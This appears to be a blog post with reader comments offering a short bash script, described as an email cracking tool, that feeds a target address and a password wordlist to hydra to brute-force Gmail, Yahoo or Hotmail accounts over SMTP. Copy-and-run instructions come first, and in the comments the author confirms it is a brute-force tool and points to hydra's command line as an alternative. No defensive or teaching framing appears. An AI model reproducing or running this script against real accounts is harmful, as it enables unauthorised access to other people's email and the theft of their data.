Copy and paste this code in any text editor and save it as anythin.sh
and then
- open terminal
- cd to script Directory -[where the script is placed]-
- and run command ./anything.sh
- and fillup further information.
#! /bin/bash
echo Simple Email Cracking Script in bash
echo Written By: Alan Cao
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
heheheh TAke Care
nice job
ReplyDeletethankx.... bro
Deletekeep visiting ....
it didnt work for me cam u help
ReplyDelete#Hackers #Creed
Deletebro this is just a bruteforce script..... it uses hydra to brute force the email accounts....u can simply use CLi of hydra to bruteforce if u r facing an problem.....
thanks n keep visiting .....
nice
ReplyDeleteThanks.... keep visiting !
DeleteSuper thanks for sharing your knowledge
ReplyDelete